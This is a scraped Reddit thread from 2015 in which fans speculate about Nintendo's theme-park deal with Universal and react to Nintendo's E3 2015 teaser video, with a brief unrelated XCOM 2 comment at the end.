Nintendo finally figured out their financial recovery - there's always money in the banana stand! For Pokemon collecting, I was thinking about something more along the lines of Disney's pin trading. Hell, if they want to go full Pokemon style, they could award gym badges for things like beating an arcade machine with a gym leader CPU. You swipe your "trainer card" and if you don't have the badge, it will let you battle the leader for a chance to get them. [deleted] I would move to Universal if they did Nintendo pins. I love pin trading at theme parks.  You had me at Star Fox simulator. I'd love to sit in a life-size arwing. Step one: amputate your legs.  I think it would be awesome to have a Pokemon snap ride in the style of the Buzz Lightyear's Space Ranger Spin at Disney World. Instead of a laser gun you'd have your camera and it would be just like playing through one of the levels. At the end they could let you choose your 5 best pictures and print them off as a souvenir. Knowing how theme parks work you'd definitely have to pay for them but it would be worth it! I had a similar idea, and then randomize the Pokemon who appear so only certain people will ever happen to get a picture of  Mew or something like that. donkey kong-fun expedition through jungle

metroid - scary lab outbreak 4d show with live samus character

zelda- temple of time master sword pull and maze forest dungeon

mario- assisted jumping cables platformer simulator and castle

star fox- 3d reactionary roller coaster/game with headset visor,blaster and barrel roll

luigi mansion-kiddy maze with light and vacuum augmented reality

wii sports arena-where kids can play

link vs ganon live performance show

mario vs bowser show

 [deleted] [deleted] [deleted] [deleted] You forgot the pokemon snap ride. [deleted] [deleted] A power tower shaped like kirby or DeDeDe. An entire section of the park dedicated to pokemon  [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] I live in Orlando, FL so going to theme parks a lot is the norm, and I get to see how the parks change throughout the year. Whenever there is construction going on at Disney, they put up walls with signs that read "Please pardon our pixie dust, magic is happening." or something to that effect. At Universal they put up posters of old movies on the walls with some fun facts.

I so hope that when Nintendo has their park area and they're doing construction that the walls have little signs that say "please understand." They could just plaster pictures of sad baby Luigi and people would probably treat that as an attraction all on its own. I went when they were building the Harry Potter section. They had a bunch of [Ministry of Magic posters](http://upload.wikimedia.org/wikipedia/commons/3/3f/WWOHP_Coming_Soon_Billboards.jpg) put up on the walls.

I love the amount of detail and thought that seems to go into Universal's areas.

 **What people really want:** A whole chunk of Universal devoted to Nintendo-themed attractions, similar to the Harry Potter area.

**What people think will come:** Attractions based off Nintendo's IPs sprinkled throughout Universal. Mario, Metroid, Zelda, etc.

**What will most likely happen:** A single Mario-themed (or several IPs shoehorned into one "World of Nintendo") attraction with a Nintendo-themed gift shop. My guess is we'll see rides in Universal's Osaka location before we see anything in Florida, but cool nonetheless. I'm not so sure about that. Now that Disney owns Marvel, and a large portion of Universals attractions are marvel superheroes in Florida, they might just rebrand that whole area of the park since their contract is up or about to be up.  &gt;they might just rebrand that whole area of the park since their contract is up or about to be up.

Not sure where this misconception stems from, but their contract isn't about to be up. In fact, the only public knowledge we have is an SEC filing that shows that as long as they keep the Marvel part of the park in business, they'll retain the exclusivity of Marvel rides in that region.

At this point the only way Universal will lose Marvel is if they accept a very fat check from Disney, or decide on their own to shut the rides down. You seem knowledgeable in it, can Universal sell Marvel merchandise in their parks or just have the rides? Yup! The deal allows them to sell Marvel merch, but they don't have free reign to make their own Marvel merch. They either have to buy official merchandise from Marvel to re-sell, or they have to work with Marvel directly in the creation of any of their own Marvel merch as if they were any other licensee.

Marvel (Disney) gets a royalty from it all of course, including if Universal decided to slap Marvel characters on their soda cups. 

Which is ultimately why I can't see Disney ever shelling out the money to buy out the rights from Universal. Disney is making money through Universal's success, and they're in a position where they don't really *need* the Marvel properties to bulk up Disney World. 

It would be far easier to just limit their Marvel rides to Disneyland and the international Disney parks, keep collecting their cut from Universal, and let Disney World grow on the Pixar and Lucasfilm properties they now own. Complementary to that, because Universal *doesn't* have any Marvel exclusivity outside of Florida, they'd be in direct competition with Disney to try and set up more Marvel attractions in their other parks, which is why this Nintendo deal could be really great for everyone involved.   Thanks! I figure merchandise sales is a huge part of theme park revenue so if Universal couldn't sell Marvel this might've been a move to replace those attractions but guess not Just think...  Zelda, Link, Mario, Peach, Yoshi, Samus, Fox McCloud, Pikachu, Kirby, Donkey Kong, etc all wandering around the park.   You could ride the Rainbow Road (maybe a ride similar to the Cars one at California Adventure), go on a 3D starfox adventure (maybe a ride similar to star tours or the simpson's ride at Universal), collect Pokmon throughout the park, play video games (a large arcade full of Nintendo goodness?)...   They could sell foam/nerf versions of the Master Sword from A Link to the Past, dresses modeled after Zelda and Princess Peach, Metroid style toy guns that make cool sound effects and possibly shoot foam discs, remote control Mario karts, amiibos, plush pokemon dolls...    Are you describing heaven right now? Because it sounds like you're describing Heaven... [deleted] Here's how you could do Mario Kart in real life.  
-Electric Karts 
-Indoor track to control lighting
-Use projectors to project boxes/shells/bananas etc onto track surface
-Use real kart racing timing system to track kart positions
-Button on steering wheels to fire shells and what not
-Computer system to limit kart speed when hit by shell

So basically you drive on an indoor go kart track.  Item boxes are projected onto track surface with overhead projectors.  First get to run over the box gets an item.  When using an item such as shells, a projectors shows it moving on the track surface.  Getting hit by a shell causes temporary slow down, mushroom gives speed boost.  All of this is actually doable in real life :) Most likely it's actually going to be more like the Simpsons ride.  I spent my honeymoon in Universal last fall and most of their rides are a "4d experience" rather than an actual track and course because you can fit so much more in a smaller area.   I'm just saying you COULD race real go karts and incorporate items, not what was likely. A man can dream right? I really, really want to hear some more details. They're teaming up with Universal who created the Wizarding World of Harry Potter which is, from everything I hear, an absolutely amazing place for Harry Potter fans. My wife just went with her best friend and I'm more than a little jealous she got to go without me. I'm hoping whatever Nintendo and Universal come up with is just as creative and awesome! Disney is number 1 at creating a wonderful experience from a customer service perspective.  Universal, to me, is number 1 at creating an atmosphere similar to the theme they are using... I think universal is the right choice for partnership. From that Tweet, I would rather think it's about a nintendo attraction at a Universal Studios themepark, maybe the one in Osaka. Relevant HAWP:
https://www.youtube.com/watch?v=y6j2-mlPpi0 Given that Nintendo is the only company in the world that has IP whose recognition is equal to, or eclipses, that of Disney -- this is a great idea. 

IIRC, Mario is more recognizable than the Mickey's Mouse Ears.  If this is anything like the old Sega World that was in Sydney during the 90s, I would definitely visit. I just hope the venture doesn't end similarly... Can you imagine how absolutely sick it would be if they made like a Mario Kart style go karting track? It's gonna be in japan, isn't it.

I'll just pretend it never will happen to avoid the heartbreak of not being able to go. We don't know that yet. I'm guessing it's a world-wide deal. I wouldn't be surprised whatsoever if we see it both in Japan AND in Florida or Hollywood, especially if it proves successful in the first place it ends up (which, yes, is likely Japan).  Things that absolutely need to be made into rides:

Mario Kart (obviously)
Donkey Kong Barrel ride
Pokemon Snap
Metroid water ride (like pirates of the carribean) I could see this replacing the Kids Zone, since this really doesn't fit the overall theme of Universal Studios and seems really out of place It's likely to just be in park characters.

Heck even [Crash Bandicoot](http://www.themeparkreview.com/parks/pimages/Universal_Studios_Hollywood/Theme_Park_Reviews_2009_West_Coast_Trip/ush_130.jpg) was at Universal Studios.

Or they'll have some 3DS interactivity like they've had in other places like the Louvre.

http://www.louvre.fr/en/museum-audio-guide

Keep your expectations in check. Making an entirely new theme park is very expensive people. It's likely not a whole theme park but I have to think it'll be more than just characters, if it was that that wouldn't be newsworthy. The best bet is that Universal would probably designate a themed land (or a couple) at Islands of Adventure  to Nintendo properties.  

Since Disney has the rights to Marvel in the western part of the United States (and presumably also  Japan) it may be possible that they are trying to expand the IOA concept to those locations by using Nintendo branding instead of Marvel. If you have a Harry Potter land, a Doctor Seuss Land and a couple of Nintendo themed lands then suddenly you have about half the park you could export. fun fact, Universal used to own Crash Bandicoot - which is probably why they had him [deleted] [deleted] Hmm. This COULD be interesting but we'll see. The attractions need to be designed for a broad audience that may be totally unfamiliar with the games, need to be exported to multiple theme parks, and need to run for years, potentially decades. But Universal has done an amazing job with Harry Potter and their Marvel stuff, so they can make it work. I want the Bowser roller coaster ride that was in Sunshine.  That was the first time I thought Nintendo should open a theme park :) [**@mochi_wsj**](https://twitter.com/mochi_wsj):
&gt;[2015-05-07 07:33:01 UTC](https://twitter.com/mochi_wsj/status/596216146891640832)

&gt;Nintendo taps into theme\-park business, teaming up with Universal Parks &amp;amp; Resorts. More to be announced when ready, Iwata says.

----

[^[Mistake?]](http://www.reddit.com/message/compose/?to=TweetPoster&amp;subject=Error%20Report&amp;message=http://reddit.com/355jgc%0A%0APlease leave above link unaltered.)
[^[Suggestion]](http://www.reddit.com/message/compose/?to=TweetPoster&amp;subject=Suggestion)
[^[FAQ]](http://np.reddit.com/r/TweetPoster/comments/13relk/)
[^[Code]](https://github.com/buttscicles/TweetPoster)
[^[Issues]](https://github.com/buttscicles/TweetPoster/issues)
 I am so damn excited! Especially since I live in Central Florida!! I cried years of joy and I'm not ashamed. [deleted] One of the attractions is going to be the Mario bumper karts, which will involve people throwing blue shells of death and derailing everything. was that Rocco from Mega64 singing in the background? Mega64 did last year's Fils-a-Mech video, so I wouldn't be surprised.  [Fils-a-Mech video](https://www.youtube.com/watch?v=ghEhI4CJjAM) video from last year for those curious.  I think Mega64 helped make the video. They've done stuff with Nintendo before. Yup

https://twitter.com/Mega64/status/598541079676194816 [**@Mega64**](https://twitter.com/Mega64/)

&gt; [2015-05-13 17:31 UTC](https://twitter.com/Mega64/status/598541079676194816)

&gt; Your observations are correct- Mega64 did help Nintendo make this year's Nintendo E3 2015 video! https://youtu.be/zbvzyY1FKr0

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 This is a long shot, but wouldn't it be cool if they revealed a new first party game by making it the final contest like when they revealed Super Mario Bros 3 at the end of the competition in The Wizard? F-Zero U, please.  Zero-FU, please. Actually,  yes. That would be cool. 

:-) Maybe they'll announce a new Mario 3... ^^Galaxy ^^pls This is why Bill Trinen posted a fake goodbye on twitter an hour [ago](https://twitter.com/trintran/status/598502535729520643) I'm pretty sure he messed up his timezones cause he's currently in Japan. Yep! Reading the replies to the above tweet and then this one is pretty hilarious, actually.

https://twitter.com/trintran/status/598521615006076928 [**@trintran**](https://twitter.com/trintran/)

&gt; [2015-05-13 16:14 UTC](https://twitter.com/trintran/status/598521615006076928)

&gt; Sorry for the confusion... Time zones are hard.

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 This is a lot truer than most would think.  I'm a data guy, you would not believe how often I get nothing but confused looks when I ask what time zone the date/times are in.  It is currently 1431559231, duh. In the year 20XX, Unix timestamps are universally adopted, and everyone got over their cyclic solar-based time systems It made the joke even funnier because he was trending on Twitter. They even went all out and apparently had changed Bill Trinen's wikipedia article. Even Google had the [cached version](http://i.imgur.com/OO8VmbR.png) in its search. Although it seems to have been rectified now. Hahaha thats awesome. Knowing that before watching the video would have made that moment a lot funnier. [**@trintran**](https://twitter.com/trintran/)

&gt; [2015-05-13 14:58 UTC](https://twitter.com/trintran/status/598502535729520643)

&gt; I guess nothing can last for ever.

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 Whhhaaaaaaa? Reggie goes into hardcore training montage mode to compete in Nintendo World Championships but doesn't [break out this bad boy?](https://www.youtube.com/watch?v=Ya0F83Bmbl4)

The power glove box even makes a "**beeewwwwoooooow wow wow wooooow**" noise when you open it in real life! Trouble is that the Power Glove wasn't actually a Nintendo product, it was Mattel. Holy smokes, that's true! I forgot a lot of Nintendo was Mattel back in the days. Well they can always give a Power Glove Mk. II to the winner.

&gt;RD: hey boss, what was it you're asking us to do?

&gt;Reggie: I need a new power glove model for the Wii U made until E3 to give to the Nintendo Championship winners

&gt;RD: The power glove? Wasn't that thing a fa- Wait, when's E3?

&gt;Reggie: 32 days. Bye. I remember having more fun playing with the power glove as a hand mounted super blaster glove than a game peripheral.  My fucking ears Woah wait back up, did the button presses on the powerglove mimic the Close Encounters tune? Definitely did.  Who else is hoping the kid will be sitting in on the Tree House stream to translate the Japanese developers. Obviously the Tree House staff could do it but it would be funny. His pronunciation seemed pretty solid! He could probably do it :P I think that kid is half Japanese... I thought it was Reggie's son... [This article](http://www.seattletimes.com/business/putting-nintendo-back-in-the-game/) says:

'One way he keeps up is by talking several times a week to his three children from a previous marriage. The oldest attends Duke University, and the other two, 16 and 10, live with his ex-wife in Florida.' 

 It's an article from 9 years ago so the youngest would be 19 now - the kid in the video is like 13? or something - so I don't think it's his son. 

Judging from the Kid's accent I'd say he probably has a Japanese-speaking parent.  Woah slow down there Batman! This video is 6 years old. Nintendo planned this all along!  I knew I recognised that kid from somehwere : https://www.youtube.com/watch?v=G7RgN9ijwE4 I was hoping for a Nintendo parody of Awesome-o when they asked the kid what they should make next.

"Um..uh...how about Mario falls in love with a girl, but it turns out that she's a golden retriever." I believe its supposed to be a reference to Bill the guy who Reggie fired at the end of the video who is currently in Japan and is probably working with translating, the joke being that the kid is taking his place. I got that. Bill has (and will probably again) sat in with the likes of Shigeru Miyamoto on the Tree House streams to translate. I was wondering if this kid will do some of the translations to continue the joke.  I would pay to see that happen DISCLAIMER STATEMENT MAY BE UNTRUE Nintendo's new policy of not taking themselves seriously is the best. This video was legitimately funny. I thought that their presentation last year "won E3" but that's just me  They've been working with Mega64 on some of their videos (including this one), which definitely helps. And the Robot Chicken guys contributed to the E3 presentation last year. They're getting some real funny professionals to do their stuff, and it's working out great.  Mega64 also did a [video](https://www.youtube.com/watch?v=xuWkvyeAu0E) with Hironobu Sakaguchi(creator of Final Fantasy) for the Game Developer's Choice Awards when he accepted the Lifetime Achievement Award.  That was amazing! Mega 64 do some amazing sketches :)  Kojima has done a lot of neat stuff with Mega64 and their huge fans of his work as well. I'm seriously hoping we get a "fuck you Konami" video out of them. [deleted] If they do, it won't be by his request or with his cooperation. Kojima probably signed a dozen different pieces of paper saying "Don't talk shit about us or our lawyers will be very angry." Or he's hopefully not a reactionary child and instead acts like mature adults do when they depart from their company. This. He has a huge, ravenous fanbase to be assholes to Konami for him. As soon as I heard the kid's name 'Tanner' and Rocco singing, I knew it was Mega64 behind the video. I had a feeling because of their previous Reggie video, but wasn't sure. Then I heard that angelic voice. The Nintendo of my youth was a goofy company personified by a wisecracking comic teenager named *Nester*, who dreamed in video games.  

At what point did they *start* taking themselves seriously? I'd say the Wii era, while not "serious" per se, was kind of a sterile era from a marketing perspective, aside from the early and pleasantly goofy "Wii would like to play" campaign.  Nah, it was definitely before that. The Gamecube was played very straight as a gaming console. They were intentionally trying to appear more grown up after they were thoroughly beat by the PS1.  yeah, they were trying to appeal to moms and children more. Frankly, it worked.  The Wii was a huge success.  Glad to see old Nintendo back, though. In my opinion, the "Wii would like to play." campaign is one of the best ever produced. That and that they set up Wii stations all over the country at the same time too. We study that marketing campaign in my business schools as one of the most perfect executions of blue ocean strategy. I'd argue that was more for the console's nature as the 'active' games console than it was for the sterile Apple style marketing.

All those retirement homes and Oprah appearances you know. I would love to see some statistic of how many consoles sold were under these circumstances. My parents bought one for Wii Fit and never plugged it in. I know so many older couples that did the same and either played with it a few times or not at all. Definitely sold more as a fad than a console, evidenced by how much lower its software sales were compared to PS3 and 360.  Well and there was just never all that much content comparatively. I have a 1TB external connected to my modded wii - I'm pretty sure that all the wii games produced collectively don't exceed 1TB.  Maybe not all the *good* ones, but oh god the shovelware I think the Wii's success was more of a right place at the right time. Sure, Nintendo made a huge amount of cash on it but the ground breaking console just didn't have legs and the Wii U is the proof in that. The 2000s absolutely. They didnt want people competing with super smash brothers a few years ago, they almost shut down locally sourced tournaments. Now they are fully embracing it. What ever happened with the whole Project M fiasco? 

I didn't follow it all the way through. Still not running at anything they sponsor, because that way they can stick their fingers in their ears and go 'la la la, we know of no such thing' rather than unleashing the lawyers. Kind of. The problem being that they're causing a stupid amount of majors and twitch streams to drop the game in doing so. It's basically killing Project M without the PR disaster that would be an actual lawsuit. If they didn't want to strangle project M they really don't have to stop people from streaming it and holding tournaments at majors and commentators even saying the game by name, since they're on top here they can say "la la I'm not listening" no matter how close to them it gets.

Of course I'm of the opinion that they should hire the pmdt to make smash 5, but hey not everyone can be Valve.

Edit: Just a quick edit for clarification; the point is that nintendo IS trying to take out project M. They're just going for a subtle approach since they know a cease and desist would be PR suicide. They learned their lesson with the evo fiasco. It's not 'cool' of them to not pull a c&amp;d, it's something they can't reasonably do because the amount of backlash they would get for it wouldn't be worth it- so they went with the next best thing, essentially strong arming it out of the competitive scene by telling everyone to stop talking about it and stop holding tournaments. This isn't something they have to do, it's something they're doing because it's pretty easy for them since they were already going to hand out all those contracts and it whittles away some potential competition. I don't think Nintendo cares about Project M. They want more people playing the new Smash.  This is the reality of it. They had no problem with PM in tournaments until Sm4sh came out, but now they want people buying and playing the new stuff. that may be true but remember that PM is an unofficial mod with tons of stolen IP in it from several different companies, it's a legal nightmare and honestly it's nice of them to not shut it down completely. Hey don't forget Howard, the perfect straight man to Nester.  I was sad when he left the company, I still miss him and his bow ties. You didn't tell them about...the RUMBLE PACK, DID YOU WHOAH. I actually felt it. The fact that they parodied [this video](https://youtu.be/G7RgN9ijwE4) had me cracking up. I love a company who doesn't take themselves seriously.

(I just wish they'd stop being such dicks to youtubers.) As soon as he started talking I hoped it would reference this. I was just sat waiting for "you could do anything?", and then it happened! Seriously, this video was fantastic. Great job Nintendo. They aren't doing those things to streamers and such anymore. Hahah, I love it. Nintendo is like that fun uncle who cracks jokes and plays old videogames with you in a cheesy-but-endearing way. They'll always have a place in my heart!  Microsoft and Sony are in the industry of technology

Nintendo is in the industry of fun In the realm of marketing and corporate relations, I would argue no one was more fun than Sony during the era of Kevin Butler. Or in the PSone Era when Crash Bandicoot would insult Nintendo with a megaphone outside their building.  They were just following Sega's example.  After all, Sega does what Nintendon't. like, selling games That was some blast processing right there. Why did Kevin Butler have to go? His gameinformer interview in particular was hilarious. He was just an actor working for an ad agency hired by Sony. At some point the contract between Sony and the ad agency ended.

There was also a conflict of interest when the same actor was in a commercial for tires(?) and there was a Wii in the commercial. Also I think diminishing returns. They probably could've kept up the commercials for another year or so, but at some point it would've run its course. Still would've loved the character to host the E3 press conference. Those were damn good commercials Then he got fired for playing a Nintendo console... Make no mistake though: Nintendo is first and foremost a business... I feel like at the top of the company, people like Miyamoto and Iwata truly are dedicated to fun.

The people above them, however, are not. Some of their shareholders are even displeased about the fact that they're in the video game business. Maybe, but I don't think it's safe to assume that they are "just in it for the art/fun." They're in it because it sells better than playing cards, lol. [deleted] Unless you're a let's player.  That's it. People are quick to forget that Nintendo are ass-backwards when it comes to pretty much anything online. No kidding. I can't believe I had to scroll down this far to find this. Screw Nintendo and the shit they've done lately with youtube, twtich, and competitions. &gt; I thought that their presentation last year "won E3" but that's just me

I had little consideration to purchase a Wii U or a 3DS before E3 last year. If winning E3 means converting gamers who had never previously owned one of their consoles into purchases of not one but both their console and their handheld then they certainly won it for me too.

I haven't spent a bunch on games (got a lot of fitness oriented games, Mario Kart and Zelda on Wii U and Monster Hunter 4 and Zelda Majora's Mask on my Majora's Mask 3DS XL) yet but I know that I will. Have already put away a preorder for the Yoshi game next month and the three amiibos (my first) along with it - partner's mother runs her own knitting small business and those amiibos were just too cute to not buy.

Perhaps its just from my perspective but they seem to be hitting their niche of young or inexperienced gamers very well. Wooly World appears to be precisely what my partner needs to continue learning how to play (before me she had never played games) and she just loves Mario Kart and the Zelda games fascinate her from a cutesy/artistic/adventure perspective as well.

When you have videos and presentations like this and E3 it really does wonders for the gaming public's connection with their company and brand. That's a strong message considering Japan's culture isn't always so lighthearted and welcoming (at least in my experience). I've become a big fan. Ahem, microsoft.   https://www.youtube.com/watch?v=ePa4NUzR1Wo Yeah, I spent a fair bit of time at PS, and Xbox's pavilions, the Nintendo one was just hands down better.

The staff girls actually knew  the games and could/would play them with you, the area had more 'buzz' there was more hands on things going on.

Maybe it helps, that Nintendo is at it's best when played with friends locally (on the couch) and you just had a huge room of that going on everywhere. That's not just you.  They absolutely had the best showing last year.   RIP in pieces Bill ;_;

Anyhow, it seems they realized last year they had a winning formula, so there's no reason the change it. Hyped as fuck for this year's E3. Reminds me of this:

https://youtu.be/k08pQDoPmXc Nintendo of America seems to be great at making fans happy... Digitally. They could be better with this whole amiibo situation. To be fair, that's not entirely their fault. The labor disputes with the dockworkers were causing them serious problems. That's been resolved for awhile now and their entire stock situation is still abysmal with most stores receiving rare Amiibo quantities that are in the single digits even in ideal shipping situations.

Hope you didn't want any Amiibos from Fire Emblem because pre-orders sell out in seconds and retail stores only get 2-3 on average for their entire shipment. I think that's a result of people snatching them up as quick as they can hoping to resell them or because they expect them to be in short supply. It's a self-fulfilling prophecy. I think that you're right to a point. Resellers are a problem and are almost certainly causing issues when it comes to pre-orders. But shipping 3 Lucina Amiibos to Best Buy for launch day? That's all Nintendo.

The kicker is that for the most part there's no problems with Amiibos in other regions. Europe and Japan both have plentiful stocks, it's just Nintendo of America that can't get their shit together. Mix in scumbag scalpers ordering dozens any chance they got, it's not entirely their problem. The ending reminds me of [this video](https://www.youtube.com/watch?v=QSlJRRwhytc) from a while ago. What we learned:

-The Digital Event (on Tuesday) and Treehouse Stream are coming back.

-There will be "even more games and guest appearances by our developers"

-Mario Maker playable demo for Best Buy incoming the week of E3

-Nintendo World Championship return?

-Trintran is \#fired Don't forget the game where "you can do anything." Peter Molyneux confirmed to be making a nintendo title that will never release. Zombo for Wii U? You can do anything in Zombogame. THIS IS...  ZOMBOU! I thought that was a reference to this - https://youtu.be/G7RgN9ijwE4 also that Reggie may have a terrible taste in video games or might just be a troll since he likes the Virtual Boy He was knocking things over on purpose to show the design flaw of the Virtual Boy.  The big Virtual Boy games weren't bad, it's just that the PLATFORM was. Agreed.  Wario Land was fantastic.  Teleroboxer is still my favorite boxing game of all time.  Those controls were awesome! Mario Clash and Tennis were awesome too. I just laid on back in my bed and put the VB on my chest and face and could play for hours. I loved that shit. Considering they worked with Mega64 last year and the singing sounds like Rocco I'm pretty sure this is another video from them, in which case the Virtual Boy is intentional. And he plays Track and Field just like everybody else.

Jumping off the mat during the long jump was equally hilarious. [deleted] Does anyone else think that Mario Maker isn't a "big" enough game for this year's Best Buy event? In years past we've had Smash, and then the choice of four including Mario Kart 8 and Wind Waker HD. Despite a participating Best Buy being close to me, I may not make the drive just because I don't want to deal with the people. There's a lot they haven't mentioned about the game but everyone has secretly wanted a mario editor for a long time, and this is a great sequel to Mario Paint which I'm hoping they throw in some throwbacks in there. Flyswatter game plz. Confirmed in a earlier video. I was ambivalent about Mario Maker until this comment. 

You just cost me $60. Link for the love of god, link... Please! I agree. It'll be cool to finally have this, but for $60, I don't see this going anywhere. With what they've revealed this far, I certainly don't see myself spending that much to create and play 2D Mario levels.  On the other hand, it's a game that would be better for people to get their hands on and play rather than see screens/videos of. "Mario Maker? What's that? How does it work?" And it may build hype for what is (so far) one of their more low key titles for 2015. I actually disagree. Mario maker could be huge, and a console seller. It could pull in a lot of the older crowd as well as the young. Mom and pop and by god even grandparents these days are gonna love playing the retro levels. I really do hope that happens. Maybe Mario Maker will sneak in under the radar and blow everyone's minds. It just doesn't quite scream killer app to me yet. Maybe info revealed at E3 will change that. As soon as someone makes a really challenging level that gains popularity, it could blow up.  Millions of level designers are about to be unleashed and if there is a good way of weeding out the crap, there could be a ton of cool Mario levels about to happen.  Clearly bringing back the Nintendo World Championships is their attempt at replicating the huge success that was the Smash Bros Invitational last year. 

Wonder what games will feature this time. Splatoon? Star Fox?  Nice shout out to the older gamers with the hands on the power pad. It was so much more efficient than jogging in place! I'm hoping the Nintendo World Championship becomes a yearly thing from now on.  Last year's Smash Invitational was pretty great and I'd love to see it extended to other Nintendo games.

I wonder what the prize(s) could be.  Probably amiibos or games, but it'd be cool if it was something else. Pokemon's annual VGC events are pretty great as well. Nintendo and Game Freak have warmed up to the idea of holding big tournaments and streaming them for people to see in recent years and I couldn't be happier about it.  [deleted] [deleted] [deleted] Good to see Nintendo are still there doing their own thing. Bit disappointed though that this means that the Squeenix and Nintendo  events are set for the same time - maybe not a huge amount of crossover but I'm not sure it's a good move for either company. I think Square Enix just shot themselves in the foot to be honest. Nintendo's had that time slot for years, and I think it's safe to say that more attention's going to be on Nintendo's event rather than Square Enix's. If Square Enix is going to spend a whole load of money on a conference, it would probably be better to do it at a time where it's got all the attention. For me, after last year Nintendo's E3 presentation, and this year's announcement, I know I can expect something great out of it, while Square Enix's is kinda...meh, for the past few years.

Maybe we'll get a new tech demo, and some new footage of the new game they have been working on for the past 2 years, but not without 80% of it taken up by the developer talking. There is nothing to expect really. [deleted] This was a great video.  Humor and nostalgia.  Anyone remember "The Wizard."  Now I have to go find some youtube videos.... Imagine they reveal a new game and they get the chance to play the first level live on stream? SUPER! MARIO! BROTHERS! THREEEEEE! Imagine they just use this to unveil Super Mario Bros 5. Wasn't that Yoshi's Island? That was Super Mario World 2, technically. I don't even know anymore.  You can find those YouTube videos all the way in CALIFORNIA. I'm guessing you love the powerglove? all I can say is hopefully the world championship game this time around isnt as rare as the one from 1990 *I love my Power Glove.* I wonder if the world championship games will be worth thousands like the NES ones?  Off topic, but was the Nintendo skit with Reggie playing as Fils-A-Mech already a year old? I feel like it came out so recently... time fucking flies. Did Mega64 make this? Definitely feels like their style! Seriously though, this video was great. I love how Nintendo uses Reggie to his full potential. Here's a link to their website: http://e3.nintendo.com/

Looks like there's a Nintendo World Championship 25th anniversary They should have announced that in their video!


EDIT

Okay, okay! Down votes hurt my feelings. I was making a sarcastic joke. Q-Q This was a pretty fun hype video. Glad to see Nintendo doing more fun things as part of their presentations at E3. It really helps set them apart from everyone else there.  [deleted] Anyone else catch that the melody of "Virtual Tiger" is the Wii Sports jingle?  Nice touch.

EDIT: [Wii Sports Theme](https://www.youtube.com/watch?v=d5c4KOopwLs) This is how Nintendo stays my favourite gaming company - they're the only ones that still know how to have fun. This one from Sony in response to the whole mess with used games not being playable on Xbox One was pretty funny

http://youtu.be/kWSIFh8ICaA Could you imagine how much the marketing guys eyes lit up when they saw that microsoft e3 presentation Like hyenas man, that E3 was an absolute disaster for MS. I remember when that video dropped. Microsoft got absolutely wrecked that E3. And they 100% did it to themselves. Good thing Don Mattrick is gone. Phil Spencer is a much better leader than him. I still fucking laugh at that video. Nintendo is, to my knowledge, the only console maker who revel in nostalgia as much as they rightfully should.

You aren't going to see footage from PS1 or PS2 games in any sony promotional materials, same goes for Xbox. 

Nintendo on the other hand, they really know their audience. Their incorporation of Donkey Kong Country into the vid really got me.

**EDIT:** /u/k3v1ng1994 posted a [quite sizeable list](http://www.reddit.com/r/Games/comments/35ubj4/nintendo_get_ready_for_e3_2015/cr8wvz5) of similarly nostalgic videos from Sony. Never thought they were into that. There actually was a PS4 ad thing that had a kid with a PS1 and he grows up, getting a PS2, PS3, and finally a PS4. 

 You're so wrong. There are plenty of nostalgic videos from the PlayStation marketing team especially during the time of the release of the console. I loved this video. Reggie being goofy is the best. This is why Nintendo always has a soft spot in my heart. 

I'm excited for whatever they have planned.  Also, this means Nintendo and Square Enix will hold their press conferences at the same time on June 16th. Not sure why they didn't have the kid make legitimate suggestions. Would really contribute to the absurdity.  I'm pretty sure it's a reference to [this video](https://youtu.be/G7RgN9ijwE4). Reggie's kid fucking nailed the delivery on that as well. Thank you. I had to scroll way too far down to find this. I was expecting straight up business babble out of him. Would have been hilarious I have never laughed so hard about something in my life.

I think it's great how Nintendo has become more loose, and isn't afraid to make a joke about themselves. The way the Virtual Boy was a piece of shit, the running with using the hands. Reggie is the best president of any company. Anybody know what new games they're expected to show off and discuss? I must have missed it, if this video mentioned them. I'd guess we'd be seeing a lot of Star Fox since it's still supposed to come out this year.  Star Fox. Other than that, I don't have a clue. Most of their big tent pole titles have already been released and they said Zelda won't be there. They'll probably give an American release date for Xenoblade then mention Devil's Third and Yoshi. Hopefully Fire Emblem as well. It's due in japan about 10 days after the E3 presentation, maybe we'd get some hype or a release day for that too. Are they going to announce a huge game afterwards like the last one? I can just imagine. What is the music playing at 2.20? That would be [Star World](https://www.youtube.com/watch?v=uwEAadGPETg) from Super Mario 3D World. Wonderful. Great to see a big company having some fun with what they do, especially at the top levels. It's trying way too hard, but I love Nintendo being way more invested in E3. It's good for the industry &amp; everybody. I kind of got the impression that it was the point of the video. That's where the humor is in my opinion. It gave me a bit of a laugh and I thought they did a crazy good job with the digital event last year.  [deleted] Where can I find the song that is in this? Great parody. [deleted] It will be interesting to see if Nintendo repeats what they did for the original NWC and hack together a single play through of multiple games.  It would also be awesome if they release that if they did it. I really hope they invite speedrunners from Games Done Quick to speedrun classics. Would love to see everyone go nuts over the Super Mario Bros: Lost Levels speedrun They'll probably adapt NES Remix which is already a fairly similar concept. Wow, I haven't really cared about Nintendo for the past few years but with this video they won me over. I'm totally going to be watching their E3 events. With the Wii and the DS-3DS all garnering support from such diverse crowds, I feel like Nintendo really lost focus of the demographic that made them popular. 

But recently, they seem to have been going full steam ahead with trying to bring those gamers back home. This advert even went as far as to straight up show you the year in which they are targettibg people from, with the event from 1990. I love it.  Early Prediction: They are completely underestimating how huge this event will be, the turnout will be amazing but it will be a logistics nightmare.

If Valve software can fill a stadium for Dota 2, I can only imagine how big the interest will be fore Nintendo. Super stoked for this. Interested to see if civilians are going to be more than just mcguffins to rescue considering it looks like we're going more civil incursion this time around. 

Also how that massive dropship plays into things. That massive dropship is almost certainly your base in this game.

*EDIT: It is!*
**From the XCOM website:**
&gt;Take command of the Avenger, an alien supply craft converted to XCOM's mobile headquarters. Guide your strike force around the world, build popular support and expose the aliens' sinister plans.

They could be doing away with the base-building completely, or have you assign existing decks/bays in the dropship to certain functions instead of digging out the ground below your base, like you did in the old games.

